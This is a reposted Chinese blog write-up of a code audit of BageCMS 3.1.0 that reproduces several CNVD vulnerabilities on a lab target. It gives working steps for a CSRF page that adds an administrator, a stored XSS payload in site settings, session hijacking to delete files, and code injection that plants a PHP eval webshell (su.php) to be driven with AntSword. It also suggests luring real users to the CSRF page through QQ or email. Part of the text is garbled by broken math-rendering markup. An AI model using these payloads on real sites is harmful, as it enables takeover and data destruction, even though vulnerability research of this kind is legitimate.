审计挖掘之CNVD通用漏洞

本文阅读 9 分钟

前言 本次内容对cnvd通用漏洞库中的bagecms进行一个代码审计和漏洞复现,对cnvd漏洞库里的几处漏洞进行复现挖掘,发现几处新的漏洞点。本次实验为靶机环境。本次内容仅用于学习和研究,不可用于违法违规途径。 一、环境http://61.155.169.167:81/uploads/userup/1870/bagecms.zip上下载bagecms的源代码,将其放下phpstudy软件下,就能够搭建起一个web环境,然后导入.sql数据库备份文件到本地的数据库管理器。 自动化安装环境,访问http://xxx.com/bagecms3.1.0/upload//index.php?r=install,然后点击下一步即可。 img

配置数据库的信息(服务器名称、数据库名称、数据库用户、数据库密码),即可安装成功 img

img

【2021最新整理网络安全渗透测试/安全学习资料(全套视频、大厂面经、精品手册。必备工具包)获取】

二、CMS框架审计 下图为下载下来的源码文件,主要的是upload文件夹下面的index.php img

分析一下index.php,因为网站的路径结构为/upload/index.php?r=xxx

$f ramework = dirname(__FILE__) . '/f ramework/yiilite.php';
$config = dirname(__FILE__) . '/protected/config/main.php';
define('WWWPATH', str_replace(array('\\', '\\\\'), '/', dirname(__FILE__)));
define('DS', DIRECTORY_SEPARATOR);
require_once ($f ramework);
Yii::createWebApplication($config)->run();

1.<span class="katex--inline"><span class="katex"><span class="katex-mathml"> f r a m e w o r k 获 取 存 放 当 前 的 文 件 名 和 绝 对 路 径 / f r a m e w o r k / y i i l i t e . p h p 2. f ramework获取存放当前的文件名和绝对路径/f ramework/yiilite.php 2. </span><span class="katex-html"><span class="base"><span class="strut" style="height: 1em; vertical-align: -0.25em;"></span><span class="mord mathdefault" style="margin-right: 0.10764em;">f</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault">a</span><span class="mord mathdefault">m</span><span class="mord mathdefault">e</span><span class="mord mathdefault" style="margin-right: 0.02691em;">w</span><span class="mord mathdefault">o</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault" style="margin-right: 0.03148em;">k</span><span class="mord cjk_fallback">获</span><span class="mord cjk_fallback">取</span><span class="mord cjk_fallback">存</span><span class="mord cjk_fallback">放</span><span class="mord cjk_fallback">当</span><span class="mord cjk_fallback">前</span><span class="mord cjk_fallback">的</span><span class="mord cjk_fallback">文</span><span class="mord cjk_fallback">件</span><span class="mord cjk_fallback">名</span><span class="mord cjk_fallback">和</span><span class="mord cjk_fallback">绝</span><span class="mord cjk_fallback">对</span><span class="mord cjk_fallback">路</span><span class="mord cjk_fallback">径</span><span class="mord">/</span><span class="mord mathdefault" style="margin-right: 0.10764em;">f</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault">a</span><span class="mord mathdefault">m</span><span class="mord mathdefault">e</span><span class="mord mathdefault" style="margin-right: 0.02691em;">w</span><span class="mord mathdefault">o</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault" style="margin-right: 0.03148em;">k</span><span class="mord">/</span><span class="mord mathdefault" style="margin-right: 0.03588em;">y</span><span class="mord mathdefault">i</span><span class="mord mathdefault">i</span><span class="mord mathdefault" style="margin-right: 0.01968em;">l</span><span class="mord mathdefault">i</span><span class="mord mathdefault">t</span><span class="mord mathdefault">e</span><span class="mord">.</span><span class="mord mathdefault">p</span><span class="mord mathdefault">h</span><span class="mord mathdefault">p</span><span class="mord">2</span><span class="mord">.</span></span></span></span></span>config获取存放当前的文件名和绝对路径/protected/config/main.php
3.define(‘WWWPATH’, str_replace(array(’’, ‘’), ‘/’, dirname(FILE)))获取网站的根目录
4.define(‘DS’, DIRECTORY_SEPARATOR);定义目录分隔符
5.require_once (<span class="katex--inline"><span class="katex"><span class="katex-mathml"> f r a m e w o r k ) 在 i n d e x . p h p 脚 本 执 行 期 间 包 含 并 运 行 指 定 文 件 y i i l i t e . p h p 6. Y i i : : c r e a t e W e b A p p l i c a t i o n ( f ramework)在index.php脚本执行期间包含并运行指定文件yiilite.php 6.Yii::createWebApplication( </span><span class="katex-html"><span class="base"><span class="strut" style="height: 1em; vertical-align: -0.25em;"></span><span class="mord mathdefault" style="margin-right: 0.10764em;">f</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault">a</span><span class="mord mathdefault">m</span><span class="mord mathdefault">e</span><span class="mord mathdefault" style="margin-right: 0.02691em;">w</span><span class="mord mathdefault">o</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault" style="margin-right: 0.03148em;">k</span><span class="mclose">)</span><span class="mord cjk_fallback">在</span><span class="mord mathdefault">i</span><span class="mord mathdefault">n</span><span class="mord mathdefault">d</span><span class="mord mathdefault">e</span><span class="mord mathdefault">x</span><span class="mord">.</span><span class="mord mathdefault">p</span><span class="mord mathdefault">h</span><span class="mord mathdefault">p</span><span class="mord cjk_fallback">脚</span><span class="mord cjk_fallback">本</span><span class="mord cjk_fallback">执</span><span class="mord cjk_fallback">行</span><span class="mord cjk_fallback">期</span><span class="mord cjk_fallback">间</span><span class="mord cjk_fallback">包</span><span class="mord cjk_fallback">含</span><span class="mord cjk_fallback">并</span><span class="mord cjk_fallback">运</span><span class="mord cjk_fallback">行</span><span class="mord cjk_fallback">指</span><span class="mord cjk_fallback">定</span><span class="mord cjk_fallback">文</span><span class="mord cjk_fallback">件</span><span class="mord mathdefault" style="margin-right: 0.03588em;">y</span><span class="mord mathdefault">i</span><span class="mord mathdefault">i</span><span class="mord mathdefault" style="margin-right: 0.01968em;">l</span><span class="mord mathdefault">i</span><span class="mord mathdefault">t</span><span class="mord mathdefault">e</span><span class="mord">.</span><span class="mord mathdefault">p</span><span class="mord mathdefault">h</span><span class="mord mathdefault">p</span><span class="mord">6</span><span class="mord">.</span><span class="mord mathdefault" style="margin-right: 0.22222em;">Y</span><span class="mord mathdefault">i</span><span class="mord mathdefault">i</span><span class="mspace" style="margin-right: 0.277778em;"></span><span class="mrel">:</span></span><span class="base"><span class="strut" style="height: 0.43056em; vertical-align: 0em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right: 0.277778em;"></span></span><span class="base"><span class="strut" style="height: 1em; vertical-align: -0.25em;"></span><span class="mord mathdefault">c</span><span class="mord mathdefault" style="margin-right: 0.02778em;">r</span><span class="mord mathdefault">e</span><span class="mord mathdefault">a</span><span class="mord mathdefault">t</span><span class="mord mathdefault">e</span><span class="mord mathdefault" style="margin-right: 0.13889em;">W</span><span class="mord mathdefault">e</span><span class="mord mathdefault">b</span><span class="mord mathdefault">A</span><span class="mord mathdefault">p</span><span class="mord mathdefault">p</span><span class="mord mathdefault" style="margin-right: 0.01968em;">l</span><span class="mord mathdefault">i</span><span class="mord mathdefault">c</span><span class="mord mathdefault">a</span><span class="mord mathdefault">t</span><span class="mord mathdefault">i</span><span class="mord mathdefault">o</span><span class="mord mathdefault">n</span><span class="mopen">(</span></span></span></span></span>config)->run();Yii框架启动webApplication对象

img

分析一下yiilite.php,在index.php中包含了该文件

1.yiilite.php将常用的类打包在一起,减少了include的调用
2.去掉了这些代码中的trace()调用和注释
3.yiilite.php减少被引用的文件数量并避免执行跟踪语句

img

分析一下main.php,Yii框架启动对象的时候调用了这个文件 定义了多个数组来存放数据,如gii模块存放密码和主机的ip地址、db模块存放数据库的信息等 主要介绍urlManager模块

'urlManager'=>array(
 //'urlFormat'=>'path',
 'showS criptName'=>true,
 //'urlSuffix'=>'.html',
 'rules'=>array(
 'post/<id:\d+>/*'=>'post/show',
 'post/<id:\d+>_<title:\w+>/*'=>'post/show',
 'post/catalog/<catalog:[\w-_]+>/*'=>'post/index',
 'page/show/<name:\w+>/*'=>'page/show',
 'special/show/<name:[\w-_]+>/*'=>'special/show',
 '<controller:\w+>/<action:\w+>'=>'<controller>/<action>',
 )

1.借助YII框架的路由管理组件,实现url规则的多样化
2.<controller:w+>//这是指匹配控制器
3.<action:w+>//这是指匹配控制器内的方法
4.<pid:d+>//这里指获取相应的请求参数的key

img

三、CSRF跨站请求伪造攻击 CSRF攻击原理 当你登录一个正常网站时,浏览器记录下了你的cookie信息,攻击者盗用了你的身份,以你的名义发送恶意请求(对服务器来说这个请求合法),完成了攻击者所期望的操作。 img

1.正常用户或管理员打开浏览器,访问受信任网站,输入用户名和密码请求登录网站;网站发送cookie信息返回给浏览器,正常用户可以发送正常请求到网站 img

2.攻击者构造含有攻击性代码的网页,制造网页过程如下 (1)在网站的添加用户模块,选择添加用户,并且输入添加用户的各个参数提交,然后利用burpsuite抓包获取请求包,请求包中会携带访问的post请求数据信息,点击右键--->相关工具--->CSRF POC生成,即可成功csrf的poc img

(2)将其poc(HTML代码格式)复制下来,自己新建一个html文本,然后复制进去,如果是在真实环境的话可以通过QQ、邮箱、个人VPS等途径,让用户去点击这个html文本,就可以执行添加用户的操作 (3)分析POC构造,<form action="http://网站IP/bagecms3.1.0/upload/index.php?r=admini/admin/create"; method="POST">,访问正常网站,并且将hidden隐藏的请求数据通过submit方式提交,这里我的value参数值都是1 img

3.用户未退出网站之前,在同一浏览器中,打开一个网页访问CSRF POC制作的网站(这里可以自己修饰一下,让用户有去想点击这个页面的想法),点击之后就会网站会以为是用户的正常请求,从而添加一个用户 img

4.浏览器在接收到这些攻击性代码后,根据CSRF POC网站的请求,在用户不知情的情况下携带Cookie信息,向正常网站发出请求。正常网站并不知道该请求其实是由CSRF POC网站发起的,所以会根据用户的Cookie信息以用户的权限处理该请求,导致来自CSRF POC网站的恶意代码被执行。 img

四、XSS跨站脚本攻击 该攻击存在于后台的站点设置模块,通过构造XSS脚本攻击能够实现弹窗功能 img

因为后台站点设置的内容要回显在页面上,所以等会查看弹窗的位置也在前台页面查看 img

代码分析,全局搜索到footer.php文件,发现联系我们模块代码都是<?php echo xxx ?>这种格式,于是我们构造简单的XSS语句<S cript>a lert(111)</S cript>,然后被footer.php执行后就会echo输出这个语句

<p class="home"><?php echo $this->_conf['_address']?></p>
 <p class="telephone"><?php echo $this->_conf['_telephone']?></p>
 <p class="telephone"><?php echo $this->_conf['_fax']?></p>
 <p class="mobile"><?php echo $this->_conf['_mobile']?></p>
 <p class="email"><?php echo $this->_conf['admin_email']?></p>

img

存储型XSS执行成功,因为是在站点设置POST提交数据到数据库的,所以每次访问首页都会有一个弹窗。 img

五、会话劫持攻击 会话劫持攻击原理 正常用户访问网站后会分发一个session,然后攻击者通过某种方法获取用户的session,通过修改自身的session去访问正常用户的数据。 img

1.目标用户登录网站,登录成功后,该用户会得到一个会话seesion来保持会话 img

2.攻击者通过某种手段获取session(XSS、暴力破解、枚举session、钓鱼等),然后修改请求包,即可对网站进行会话劫持 Cookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3 img

3.当攻击者获得会话session后,即可在不登录的情况下对网站后台进行操作(该session保持不变) 对文件进行任意删除 在一个没有登录的浏览器进行测试,此时抓包获取的session值为 Cookie: PHPSESSID=qtc31bohagca38o88kuife81j6 img

在不登录的情况下,对网站进行删除文件操作,下面为删除前的页面回显 img

在不登录的情况下抓包 修改cookie的值为Cookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3,然后请求包为删除文件的内容,点击发送数据包 img

任意文件删除成功,回显效果如下 img

六、命令执行漏洞 网站模块修改的代码配置没有对文件的内容进行过滤和检测,导致添加恶意代码进去的时候能够直接解析执行 img

在后台站点的网站模块下存放着网站的配置文件,其中question/index.php存放的是留言板的配置文件,在question/index.php末尾加上恶意代码,将一句话木马存放到文件su.php中,如果不存在则创建su.php <?php file_put_contents("su.php","<?php @e val($_POST[cmd]);?>");?> img

访问路径http://xxx.com/bagecms3.1.0/upload/index.php?r=question/index,让代码执行生效,生成木马文件su.php

img

访问木马文件su.php,然后通过post请求提交参数代码获取数据 img

通过蚁剑工具连接木马,获取webshell img

总结 在本次的代码审计和复现的过程中,首先是去看cnvd漏洞库查看存在哪些漏洞,然后再去访问可能存在的漏洞点去尝试挖掘,最后挖掘出上面这些漏洞点,并且附上挖掘思路过程。本篇文章仅做学习和研究,不可作违法违规的操作。 【资料获取】

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/kali_Ma/article/details/119960476
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复